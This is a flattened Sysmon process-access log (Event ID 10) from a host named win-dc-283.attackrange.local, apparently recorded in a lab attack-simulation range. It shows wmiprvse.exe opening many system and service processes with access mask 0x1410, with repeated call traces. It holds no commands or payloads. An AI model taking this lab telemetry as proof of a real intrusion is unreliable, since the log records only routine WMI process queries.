15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 